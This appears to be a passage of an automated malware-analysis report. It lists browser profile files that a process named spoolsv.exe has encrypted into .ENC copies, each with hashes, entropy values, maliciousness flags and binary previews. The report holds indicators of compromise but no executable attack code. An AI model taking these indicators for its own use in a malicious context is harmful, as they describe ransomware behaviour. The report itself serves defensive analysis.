                                                                                                                                                                                                                                                      SHA-512:21C9A906E8D104F9128255A058EC01BE0927FB2FD0F9B43961BBB29F537319A6B2B34156C2EC3BDD4FE9B875B00B5693ADDFFF4C7500054AFDF4D13D2C377F57
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Z.l._....up......eh..<.S.._YE<M)e...... pKd9.q....=i......!.{..?....@..:.(ZW..P=yI...6.^ .#2..Hk.W..k.y.a. ...].iu.C[3iM'....g.x.b...n.v.;.M....w.G+.W......vY.}..Wp.M.p'.;l^.L..........G...D.4B...X...+^..??.|O".........1...-.v.N|...Vu....K%.y.R!..T.....=?.g....G....$niu...&....!... .gU|....-.~....X...d...D......m+.I..q).EU..u.C.."3...]..CK<..^)+....!r..C..w..&..9.......?......&.1.Y.g..ZL..U...b.u.+..~}..U.w..+~.X)..A..b..>.Y...}.O..._.2i...-G........sj#N.....Pu..F....s.]..d.........@...yu.?".."FzB.sn7..!Sez.v.Y.x....G040`.g......>..{..VrS;.. ......1x..[....k..7qN;v..?......<.........".'..]/X.O....".......c.j.z..XJ....hJ$....&N.}....aa.BF..].\..i7......]...e....[.?L.d...Y..H9\...Q...V.V.....Jy.....59Z..CR.&[e.)OU[...n>..`.Gd..?`..Eu...f.6......=..+"..S.|.^..a..=PN7......+T..Ux;..7......u...]8.b?..wg1!b........=....OI#.|/${..*.2.....,.....V4.Az...C..i1.Hi[.w\K.=... ..T?6....k...N....._%.+..."_Ja..*........b...KAE...W.C.\r..x.<..0...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):270352
                                                                                                                                                                                                                                                      Entropy (8bit):7.999233104629878
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:25hujpp6uK1BmNB+ONY/bJdrl7QfDtxYkYfIHrStor7h:djpjKbqcSQbPrFQfDlxuox
                                                                                                                                                                                                                                                      MD5:944DDF0713D7FE5697B9156C9B86F5C5
                                                                                                                                                                                                                                                      SHA1:ADAF97427D2141AD958E12F05DE767EB74D27140
                                                                                                                                                                                                                                                      SHA-256:41ADB97B614A126E0B195A3F9721FD8C8B8846B927148A1614C4E7B1585715D9
                                                                                                                                                                                                                                                      SHA-512:BAE62EAF26A2DBC68D1FBCF715F3B6B59FCD2FF596D172A457B657BCD298108A425CC492C0FC265BAC852252DFF941C3AA8B580880A0E7D4D11E02D79F6922B6
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:/.NR/.,..[........!>...T..pl...DO...m~r.P....v...p.A_..I .G].....K}.U9C...g..v.} ?....RZ4..E.N...ij...q..N..L.^....9...>q.{%vj.I.e....v...5.._r..eWZe....M|....*-..4._.....~p.........G-<...H...=.U.....?A..DO'F|"....H..R)a.ds..R.kD;&].kk.%...D.=U.1).....z..e.5'......~;oE.1.o.d..7..........">...jq.R.R.f..Q./e..D...".,.B..C........~...i.5.@.s..E.C..pv.l...F...l..^...#.yh/.I..-V.......W....$.~.......Z...Z.`..........m.0.li...{^._Q.....l....:....O..R.Tl....h..."...O..(S....\...ql.~.....j:.d..(0.S....e...z.v2...`...."BS..<.=`.....W7.......7}...m!dF....e.D.n.@..f......a.'..Z._\...9..............q^M0....).[/.....a..I.+.T.....1u6.....s.....+0..\......KXF..........8.Y.\c.\+...~v....e.......k.G7.......NG.Y.......1..'..yA._.z.........r.._`KV....p..gJ..=i..I.Y.r...;.r...QMX....s'.J...m.....1..y0. ..q...z.&....3...x./.?r.D.&...h@l........A.....n....+|F.}...8..r.0...)...?.#.%2R.j....-......6p.1;.\..#..D..M.3.H.....P.G.|...9.B.vT....a.@.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_2.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.97783199729344
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:RUHUxe7HbS93HchHpRe963lNr30dKq3C5WakFajRY:OH+9MhJs963lNgK78aiyRY
                                                                                                                                                                                                                                                      MD5:E9570C05758D7F027A0B6D30D775B2AE
                                                                                                                                                                                                                                                      SHA1:0871E5E41EE6DF7681704EDC4A15D0F108CCCF0A
                                                                                                                                                                                                                                                      SHA-256:971C1D9CB490C2100654763CCB68E021CEAF307786ACBC54AB8B5E870528FF55
                                                                                                                                                                                                                                                      SHA-512:C1BB33C8AD522EABC58BD7DC564ABB99FE2D6F3F5B839AF5CBBE2C31CDDCBF2D543625D5E0D8741C06CCF8CACF58B33DFDA9CBAEEBAC72F03182F4B882F0CF7B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:O4'|."c.V...}.j..V!.5.c..:..E..}O..*.....nv..}...*k.f...q....mUe$4..~.G...M.-]......V.i.s....o..hRQ.........nc...q.xb.rNg.....K..6.R....9u.:.*...... ..;...#.......wb....ia.Z....sy.m...........J=.-.5.K9..hu.:.;*u...A$...<u.#..<......_>._.m..n.v..rH......C.|...s$.P...h3..T..v..../|U...!~9...s".d...w..S...D...y......R..Ws..5...X..9T.(.e..N....Q....x.].....~E........h.0.`~..u:Z@?w...m....Y...0..3..W.........\....]....AR.73T9....H...~..7Z..Y`cI.B.9.LZ.]....:.I.g#...4.@...fa.....~;L.......7.8.R.5E.5g.....)w...........|.>......|.&;.G!.....6.-...oD\!.[..~....,|n.%._.l:..p.w..bF.O@......Q..MZn%..="B,..:./.ZJi>&#.c3j.O.M.f.....fhH;.....A.......0}b......` .C..0?...bU....ZX.b&..B2w9..8..%...>A..O..Y..w.U.Z.G.....?..[]|....M.rs..r..$.._U..k...Yb...[I..+......i_!n'o.d....^..Y...3.Bu..C..f...U.y..y.&c...\.(9ZG$B(.....w.....^}..g!.......uE..=SQJm..z...Kv.P....iu.i.F.G.P.#y.Z.J......@..)$..}.^...t.f.+........SJ....a~]b......m;.........Y..XLj9.d_5.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_3.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.9802964289991625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:cMysjkwUFxfDdZ8iQPD5V/6ZukJ8TDs2KPTBpk:9zAwcrdZ8iODb//kxjk
                                                                                                                                                                                                                                                      MD5:87BE137E9899697BC7B4F1817E491560
                                                                                                                                                                                                                                                      SHA1:61A6C3AB74475A3888BEC9EB379C5D2C000F4461
                                                                                                                                                                                                                                                      SHA-256:8CD873DD292A600FFEE0D755474E11248CEBEA2BD21E5CDF99F54E55B84C0545
                                                                                                                                                                                                                                                      SHA-512:12C722F981BF9A7554BF26559D9CC2FD8B32A2F534953AB65CAB7FB5D8130FF3ECD0FA828346B66D670B3BC3A70906E41944F4C87FF533FCFA71C09DAF703A8A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:OK.c...\O.:..!.......!..A..G.LnHv.P.$.K+).Q.......PL..M$HGP...K$.h..j....u.f..MZ.3................^Z>:..<.G.....<...@.H.B..........K3.?$.].B.?...'iiR+.)``P.G...N..!.|x........t.2#,.A......3...-..e0.x...Db.#A.6....._...../..-..V.W..|&..=._.>-,Q.!&.l...".....J.y....r..i.v...q[.a@{.h.o..%...Z.t.ly...1Q..7.B2...B.......'..}..J.....C#....Q2....W".D.."...M..K.5g<":...2n8!...B.e EK.I....5..,..'...V..;..(^.6.w..=.q.D.g.b2SSe/k[B....b.'..kF....`?x..3X......Sc"i.....tU..H.......Yw...LR).a.[t.....:8.j.i......i<.i..:...k......9.`7...~M.2c.L....)..8....u.?.0J..j.?[.S...C2..u.q...)...5Z.Ss.q.>..&...1....h-.I..?.lY.V.Y+h....2LG..D...-hP...._..0...r.....G.!....?. }.u..wR.....,..&0.....3.oY..9........iP..W...S....|.......P...........f....1......k....+.4.3..Ka....H.x.,..%&...V...4)}.r.M...H..-.2.......m..c..c.,..]..h$..O(.2)...U..4.."..../l.\\!~..`.ZX.....R.....a.....S.....N.DX.;.Q..$F.$_5.E.P"......mPG.R.1.4.n...e.....s....vt.[I^`..#P...N...4.;.4.\#4l

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\index.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):262528
                                                                                                                                                                                                                                                      Entropy (8bit):7.999264045719107
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:jSWGJL9Kv9/31VBXEU24Of7PtM1nXLJxQkJL4kyloRP80r:jBQLA/31VBXC4OfztK7EkFymjr
                                                                                                                                                                                                                                                      MD5:856B2D0A8014A5DE13CC9FF66DB6AA60
                                                                                                                                                                                                                                                      SHA1:16DC9EE1309413E5BF066C7F752B5104553F3331
                                                                                                                                                                                                                                                      SHA-256:4A79CC771B16B809C042CBC0968469D95AC2874C6117BC891EFCB3CDA6B66525
                                                                                                                                                                                                                                                      SHA-512:4E67FF432782A0FE2D24D2A9F3578AAB4CA7729607BEABFA40C6A91266D2B8212F11F573E8EFFFBB8684F99B76D8778F3FAF4B5C42DB69BF3E8862E08B9DF9E3
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:)]w.p.......~..e......R...m..w0=."..F..K`...s...O.cx.e.2i.qO.Md$.b]..WB.j...mx.4d...E{h.....vY...h:.a.F.G...V..:..x^..X.z_..Q~.(.v............r...;T0I...Wf;q..;g.aB.........ZO/|.\h...s......._....R.MT%.?...X...-..v...y..K..V;n.3. 6..L.t..e9B.$..+...O.m.....a..L....Ji..5..H.....K.k._.h...|.j..Q..az.2i3.....\.f.!.^Z..;.S..L..C.^X..X.:s.df.:z..:..*R .*..{....<.=+..../.N.D....0..k3.Z...$@..q.(..5....!......-...Ph......_...Q...........>...b%....sJ...@...Xwn.......xj7..8..<#.jU....B..~a-z.c..@..i..4..Zh.`..b.:`.i..8..x].....+\..^qF.T=.2.....4.m.Q~$...g..O:.....{..;..Pn...8.Q.[,8MN..... #-.L~....]E..JQ.zN..p.l#m.{......]..V..qY...u.."m.K...)..1W..P^.g...3..Q...\?....$..(($.....=Ane.....OX,....J./.?...+........(,.4+...M[.9.....h}.....#G..j...r... ..c...R*.......#.|a.=6.[.......O.....`3.O.4.Sx).Ir...d.8?2..5....D.9!-)...tE;.n..].!.#j..9'q.!.D....+IQE.....c+$i.M57..0.c..8.d..}y......r..E...p%.....K....a..O.>Y..`..#...."@.b>.1/..ip.....ES8f..."Fz.~.|-

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):66880
                                                                                                                                                                                                                                                      Entropy (8bit):7.997442482759706
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:ULegEIcb6rd0EoYcTh8iPqn60LiNR2QqrM:ULegEap0ExoHPqbLiNRWI
                                                                                                                                                                                                                                                      MD5:38C386ECDDA6B0876D6571A53A699633
                                                                                                                                                                                                                                                      SHA1:A5E01E1B5F8C16F454B2CE43484DC7C174E98036
                                                                                                                                                                                                                                                      SHA-256:6DF3D496997F4C031EF7413195A9ECD4676C8B05C7A94FD95F1245C2DA05F0CF
                                                                                                                                                                                                                                                      SHA-512:55271C35DA9CA0388982F59A17D82258C2E8B9165B277E5D430D3E9F40C57F503F0C73629C2EDE5F86BED6841AB54A202B4E87018A6DD317A2DB1140FC54DDE8
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..p.....v.U..GE...3;....Zq....e.n,C.).j.I..(&..=g.y.{...L...kl5..!...*......L.2.-.D..pN..x.....%i.=.?.....i......8.[.l5.2..Cc.g......zg.d.L.@ss..}.Wc..p.>....p.e..R.f)..2s..m!_H. #..a.&h.!.c.g...MR4<.nsa..e._..._.......o-.pD.O?...y.....b..t...T..f..k.e..9p.8$0@s.{m...~k...g..'.2u>h3....\R.(..1^o........|&*.4G,.LSEQq..t...b..oB`.G.'Me.f.......gX...3v.z...a..NCq3q...p..dr\.e..+.C&......>...aH@.o......'..|a.7..Cz...A .A..S...j..T}B..Ay.....?%........c.......3>U..........5..W9V....C.!..c"(.....g.2\.5R0..mx....P..H.#Rr.O......1..h.>.+..[w.Y.:...7/.[..P..c........ ..4H<?C7.....]....C...U~Q.T..*.^U-S........".e.F......!.q<......$*]..7d&.`...Z..J.-2.Q.'e.e...^k.....plop"......;.B..1..?.#.i..;...,.7E;...k...MFx... ..G.8.2.....1:.V.2y).s...e.../...z....VF....(6L..... 6.h..2d..L.M.uD.8.."q>.mx3./..?t...[A.....v....eR.Lr.8...l..n.T........[SR...(.fI../>..b0H...,...Vr.Yi.V@....'I.0...d.3:}yJ.Rk.<....+.o.z..J'9(.kJ.........i.{ ..v...jY)...H.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Variations.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):96
                                                                                                                                                                                                                                                      Entropy (8bit):6.264599089240291
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:YBRBU/3bADWs1xvcfenrEUNdQ/ZYCvk5Nn:YBY/b0Ws1xZ/WeC4Nn
                                                                                                                                                                                                                                                      MD5:42FFC7F600650639DEBBC8D609B727B9
                                                                                                                                                                                                                                                      SHA1:69109783509BF37956440926785F9185C8D3CF88
                                                                                                                                                                                                                                                      SHA-256:CF5B71E67A3BCB6E1F7AC060A4BE47CA700FE2A1AE374364ACA2765BA5565A77
                                                                                                                                                                                                                                                      SHA-512:46CA3C136A8B21BA6C1B109CD3548E8589C5171A293753E63613BB9B07F530F3D32651C9BBDD0D4A01E3B3FF4BF3444191762871EAED9C36A865864BEA7F5D56
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...gj._..K..l..R.......'.i..TI.U...y&b]..{...JN...n.N].gcK.!H....Cj..1..|-n...@.k^..|g..[p..L

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49168
                                                                                                                                                                                                                                                      Entropy (8bit):7.996527066102457
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:NdRTK456bILeVFVSR9FujS088D0N9D/jvsruYw7by34paQDYBWj916yVR8A:NzX6YeVirFMSy0v0C37+3qnAWj338A
                                                                                                                                                                                                                                                      MD5:111EF690AB7C123C66EE18102C5EADC1
                                                                                                                                                                                                                                                      SHA1:BD139FB49C450F63AC88A2A2E78340003E6B2E79
                                                                                                                                                                                                                                                      SHA-256:DCDB578C9931FAC7F5BE656D07528D9F6F3D039CFFFDDA2B2282F197615BE517
                                                                                                                                                                                                                                                      SHA-512:5BD48AD5738A878DA86E491F1FD5FE3D8A93925453D51C576131F7D361CF56BC28A2ABD9AF769F98072054B659482B9CA8A990FAD15967D86EAB6536A3F5B7CC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*..........F..1.H!~...*.G......".!...%Ja.).;z....:6G.. ....J...v{..P.L'?3n/.'P^..ah...Ea.D..5...{.)@..S.h.9.+)....*.f..,.-.x..f..t~..{z......4......$..o.u-\{..0..r..nW.chY..v.?...v.0.j.N.<..`...*..h..Re%}...Q.......1.g^b\.....S...MR.P.Y./.6...OJ.@).<..vaq.#.)..~..j.z`..C.;.......z.L.T.../u.....%....r......2.M.S.X.U....Zw.....R..V.....l.......^A/F.B...ym.%6-...T.qU.'....+....!..?.....t{.U.Lkl.z..V..z.@G..@..m`.<..q.&...`l.E.?.~.].Ly_...g.r.:U.<}.~d..~.KE..Y.O.....Dzj.......<...p.,.[..02.s..Yi<.O...s.i...p.a>.#v.n...4:@.m......c@.5*.r.....l.N!...|./...v....{.B...........<o......^.f....)U!..3.=&7..IWu...&.....N.!W...@)..L.R<.rF.c^...u...D..N.V..4z/....w.!......R....H).<vQa...._.<M.@#@:............_R...~.y..Vi(.......s...`=.7....p...=k]?.....M\.J.....N:..4t.a..s.K"........?&.Ko.0.zU.1$}....<.`'...Q.X1.Q.....8GXV.k .3....)..=......U....e..'>..9...].T.k...mXH...%o..q..u..0.g.0..$.woV..T9@\'.Ef.....r..>(<.@..x...'..ZP.?...I.3..j2....|3..^.C....|

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\segmentation_platform\ukm_db-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1232
                                                                                                                                                                                                                                                      Entropy (8bit):7.856143313434037
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:XrND3uMy1r91rhTf4Mrvn48tuespYqAxAfUqevHpeSYgsMtAxjJ5SFw:XrC1Thfl3uyqAxAOvHpeSFAxnj
                                                                                                                                                                                                                                                      MD5:96A252E944667CACDFB3452173682559
                                                                                                                                                                                                                                                      SHA1:E70EDADC14BD3C2ADA3C3E336815A9DF0575EC1B
                                                                                                                                                                                                                                                      SHA-256:55ACD78B6BD5E7F47B50973E7D25519F2C5773823FE54E946E41D7EA8E7D2308
                                                                                                                                                                                                                                                      SHA-512:2836177ACCFD72C153431F41E2AD5DA7605ED9DEBF4A54E5F22B79C3D3CBCA826B30570125CAC32C5091B9B20EA2AA8925CD390BDECCB48F1F53355390506E3C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.37!"..V..@..\.<.Ty...\.....>..,.o.H..B...sP.+..F...j..&...%.Wd..'.N..Y...-....GX%Y.[d9{.J'.....}j.....]J;.)I6...W..2_$...u..R....8....1k.c..V...S...#........H.2.)...(.sZ0..o......2D...@W&.H....>..*..Y.~....[.O.p........j....o..|.f....|..t......m].\q8..G..N.....`...!e.....k.......W.f.....\.Kf).....B.....e..L.M.......T....AI...c.Z.........{;$T.......\?UL;.\.?.K.LT.....gz.._..a.M...GX.W\..A}`...Vn%.......`.KP...B.....9.y... b...w4.G....H._.e.]\S!F....eN...ce~W>.).~.B..o....u....q0.Y....9.>c..v.[...s.b....B.D....C]......a..0..J.....q.>..:.^.....g...E;-......!......d.*?..m..~.D..z+..3I......[._."'...GD..X^.!B..,B.V.....O.D#.p.'.5.Tc&.....d.".%......jXu5&...!l...D.P.V=a..ie....*%xr......%elE.D..c..z.=L.L.0C}.z....!...Z.K............4V.s..u..l<.;.;M.G}7.4C.9g,g2{..`-.J.8..O..........V.a8Es....j>.G..c.....>...L..N.q0.s(......[+...../.iR(ZwFY....&.(LF...~..q0N...-.J..#..:G..V>.....24BNv..B....ar.F...fP.'.......6".?v...^X.{4H..&.V.#...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spoolsv.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):654
                                                                                                                                                                                                                                                      Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\attzwu.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\attzwu.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3094
                                                                                                                                                                                                                                                      Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                                      MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                                                                                                                                                                                      SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                                                                                                                                                                                      SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                                                                                                                                                                                      SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8\edge_autofill_global_block_list.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4400
                                                                                                                                                                                                                                                      Entropy (8bit):7.95789104521677
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:RRi4o/bVYKQNAFhQ+r0Ix2f1tZEFPDDg3ohj1KcC+b5Q:wY9ehQ+4m2L4PHndx5Q
                                                                                                                                                                                                                                                      MD5:8A8C3406BCAED046BE9728AF6ECDB3EC
                                                                                                                                                                                                                                                      SHA1:AB5E2EBE3E5D2AB96F5184B1CBE9A57088F25E97
                                                                                                                                                                                                                                                      SHA-256:B615CDBF2E065FDC29DE8EEF702AFE5A304E8C54E56E61F58A6C30B4A6E2F018
                                                                                                                                                                                                                                                      SHA-512:D8C7C0137CF80CD16AFF5D650C870C17E00FDE9B484B55768EDA94080DF47BD8BCFF380CBFC3C384EC84DA546C30EDAB465E7C3091AF2FE10FACEA6E0384FD45
                                                                                                                                                                                                                                                      Malicious:false
